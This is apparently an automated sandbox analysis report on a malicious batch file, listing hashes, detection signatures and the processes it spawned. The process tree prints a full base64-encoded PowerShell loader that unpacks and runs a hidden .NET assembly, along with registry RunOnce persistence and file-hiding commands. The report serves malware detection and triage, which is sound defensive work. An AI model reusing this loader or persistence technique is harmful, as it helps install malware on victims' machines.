Analysis
-
max time kernel
43s -
max time network
47s -
platform
windows7_x64 -
resource
win7-20220901-en -
resource tags
arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system -
submitted
02-02-2023 07:25
Static task
static1
Behavioral task
behavioral1
Sample
4qo856.bat
Resource
win7-20220901-en
Behavioral task
behavioral2
Sample
4qo856.bat
Resource
win10v2004-20221111-en
General
-
Target
4qo856.bat
-
Size
2.1MB
-
MD5
e8939f95a675b9fb924eebe38827c456
-
SHA1
fc8b276222231d8184c21c69b655903b84a59430
-
SHA256
75ce85c7868efffdd665bf1234b0e2cfc31a5bd24a493cfb6e237e7de32cb73e
-
SHA512
f149ca122eddf7e8f611427ebd146608096884ee3b9e4b97c77d2771f6119afb13f357a3d5192e099a6168606c3d3c151eefe36779f8c82640b8a2b2a75c5e08
-
SSDEEP
24576:NnNaBvX2dfBil92AzBE4y1/feTDVzt6iZ+9/5KbCSfpItxCxe0U1k2jPaez/+L6a:KGwl2vuuiY50Tk91HLiA5dLkll1n
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
Processes:
4qo856.bat.exepid process 1064 4qo856.bat.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\4qo856 = "C:\\Users\\Admin\\AppData\\Roaming\\4qo856.bat" reg.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
4qo856.bat.exepid process 1064 4qo856.bat.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
4qo856.bat.exepid process 1064 4qo856.bat.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
4qo856.bat.exedescription pid process Token: SeDebugPrivilege 1064 4qo856.bat.exe -
Suspicious use of WriteProcessMemory 13 IoCs
Processes:
cmd.exedescription pid process target process PID 1272 wrote to memory of 1296 1272 cmd.exe reg.exe PID 1272 wrote to memory of 1296 1272 cmd.exe reg.exe PID 1272 wrote to memory of 1296 1272 cmd.exe reg.exe PID 1272 wrote to memory of 840 1272 cmd.exe attrib.exe PID 1272 wrote to memory of 840 1272 cmd.exe attrib.exe PID 1272 wrote to memory of 840 1272 cmd.exe attrib.exe PID 1272 wrote to memory of 1064 1272 cmd.exe 4qo856.bat.exe PID 1272 wrote to memory of 1064 1272 cmd.exe 4qo856.bat.exe PID 1272 wrote to memory of 1064 1272 cmd.exe 4qo856.bat.exe PID 1272 wrote to memory of 1064 1272 cmd.exe 4qo856.bat.exe PID 1272 wrote to memory of 584 1272 cmd.exe attrib.exe PID 1272 wrote to memory of 584 1272 cmd.exe attrib.exe PID 1272 wrote to memory of 584 1272 cmd.exe attrib.exe -
Views/modifies file attributes 1 TTPs 2 IoCs
Processes:
attrib.exeattrib.exepid process 840 attrib.exe 584 attrib.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\4qo856.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\attrib.exeattrib +h C:\Users\Admin\AppData\Local\Temp\4qo856.bat.exe2⤵
- Views/modifies file attributes
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce /f /v 4qo856 /d "C:\Users\Admin\AppData\Roaming\4qo856.bat"2⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\4qo856.bat.exeC:\Users\Admin\AppData\Local\Temp\4qo856.bat.exe -wIn 1 -enC JABlAHgAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAEYAaQBsAGUATgBhAG0AZQA7ACAAJABsAGUAbgAgAD0AIAAkAGUAeABlAC4ATABlAG4AZwB0AGgAOwAkAGwAZQBuACAAPQAgACQAbABlAG4AIAAtACAANAA7ACQAVwBlAGIAVABpAHQAbABlACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAOwAgAGYAbwByAGUAYQBjAGgAIAAoACQAbABpAG4AZQAgAGkAbgAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQATABpAG4AZQBzACgAJABlAHgAZQAuAFIAZQBtAG8AdgBlACgAJABsAGUAbgApACkAKQAgAHsAIABpAGYAIAAoACQAbABpAG4AZQAgAC0AbABpAGsAZQAgACcAKgAgAL8AKgAnACkAIAB7ACAAIAAkAFcAZQBiAFQAaQB0AGwAZQAuAEEAcABwAGUAbgBkACgAJABsAGkAbgBlAC4AUwBwAGwAaQB0ACgAJwC/ACcAKQBbADEAXQApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAB9ACAAfQA7ACAAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAVwBlAGIAVABpAHQAbABlAC4AVABvAFMAdAByAGkAbgBnACgAKQApADsAJABpAG4AcAB1AHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAGIAeQB0AGUAcwAgACkAOwAkAG8AdQB0AHAAdQB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABnAHoAaQBwAFMAdAByAGUAYQBtACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAGkAbgBwAHUAdAAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbwBwAHkAVABvACgAIAAkAG8AdQB0AHAAdQB0ACAAKQA7ACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbABvAHMAZQAoACkAOwAkAGkAbgBwAHUAdAAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAGIAeQB0AGUAcwAgAD0AIAAkAG8AdQB0AHAAdQB0AC4AVABvAEEAcgByAGEAeQAoACkAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABiAHkAdABlAHMAKQA7ACAAJABhAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgB5AHQAZQBzACkAOwAgACQAZQBuAHQAcgB5AFAAbwBpAG4AdABNAGUAdABoAG8AZAAgAD0AIAAkAGEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAcwAoACkALgBXAGgAZQByAGUAKAB7ACAAJABfAC4ATgBhAG0AZQAgAC0AZQBxACAAJwBQAHIAbwBnAHIAYQBtACcAIAB9ACwAIAAnAEYAaQByAHMAdAAnACkALgBHAGUAdABNAGUAdABoAG8AZAAoACcATQBhAGkAbgAnACwAIABbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBCAGkAbgBkAGkAbgBnAEYAbABhAGcAcwBdACAAJwBTAHQAYQB0AGkAYwAsACAAUAB1AGIAbABpAGMALAAgAE4AbwBuAFAAdQBiAGwAaQBjACcAKQA7ACAAJABlAG4AdAByAHkAUABvAGkAbgB0AE0AZQB0AGgAbwBkAC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA=2⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\attrib.exeattrib -h C:\Users\Admin\AppData\Local\Temp\4qo856.bat.exe2⤵
- Views/modifies file attributes
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\4qo856.bat.exeFilesize
442KB
MD592f44e405db16ac55d97e3bfe3b132fa
SHA104c5d2b4da9a0f3fa8a45702d4256cee42d8c48d
SHA2566c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7
SHA512f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f
-
C:\Users\Admin\AppData\Local\Temp\4qo856.bat.exeFilesize
442KB
MD592f44e405db16ac55d97e3bfe3b132fa
SHA104c5d2b4da9a0f3fa8a45702d4256cee42d8c48d
SHA2566c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7
SHA512f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f
-
memory/584-62-0x0000000000000000-mapping.dmp
-
memory/840-55-0x0000000000000000-mapping.dmp
-
memory/1064-57-0x0000000000000000-mapping.dmp
-
memory/1064-59-0x0000000075931000-0x0000000075933000-memory.dmpFilesize
8KB
-
memory/1064-60-0x0000000073D80000-0x000000007432B000-memory.dmpFilesize
5.7MB
-
memory/1064-61-0x0000000073D80000-0x000000007432B000-memory.dmpFilesize
5.7MB
-
memory/1296-54-0x0000000000000000-mapping.dmp